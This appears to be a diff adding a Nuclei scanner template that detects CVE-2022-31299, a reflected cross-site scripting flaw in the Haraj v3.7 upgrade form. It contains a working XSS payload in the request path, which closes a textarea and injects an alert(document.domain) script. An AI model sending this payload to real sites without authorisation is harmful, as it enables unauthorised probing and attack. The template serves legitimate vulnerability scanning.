■ ■ ■ ■ ■ ■
config/nuclei-templates/cves/2022/CVE-2022-31299.yaml
| 1 | + | id: CVE-2022-31299 |
| 2 | + | |
| 3 | + | info: |
| 4 | + | name: Haraj v3.7 - Cross Site Scripting |
| 5 | + | author: edoardottt |
| 6 | + | severity: medium |
| 7 | + | description: | |
| 8 | + | Haraj v3.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the User Upgrade Form. |
| 9 | + | reference: |
| 10 | + | - https://github.com/bigzooooz/CVE-2022-31299 |
| 11 | + | - https://nvd.nist.gov/vuln/detail/CVE-2022-31299 |
| 12 | + | - https://angtech.org |
| 13 | + | classification: |
| 14 | + | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| 15 | + | cvss-score: 6.1 |
| 16 | + | cve-id: CVE-2022-31299 |
| 17 | + | cwe-id: CWE-79 |
| 18 | + | metadata: |
| 19 | + | verified: "true" |
| 20 | + | tags: cve,cve2022,haraj,xss |
| 21 | + | |
| 22 | + | requests: |
| 23 | + | - method: GET |
| 24 | + | path: |
| 25 | + | - "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1¬e=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" |
| 26 | + | |
| 27 | + | matchers-condition: and |
| 28 | + | matchers: |
| 29 | + | - type: word |
| 30 | + | part: body |
| 31 | + | words: |
| 32 | + | - '><script>alert(document.domain)</script></textarea>' |
| 33 | + | - 'content="nextHaraj' |
| 34 | + | condition: and |
| 35 | + | |
| 36 | + | - type: word |
| 37 | + | part: header |
| 38 | + | words: |
| 39 | + | - "text/html" |
| 40 | + | |
| 41 | + | - type: status |
| 42 | + | status: |
| 43 | + | - 200 |
| 44 | + | |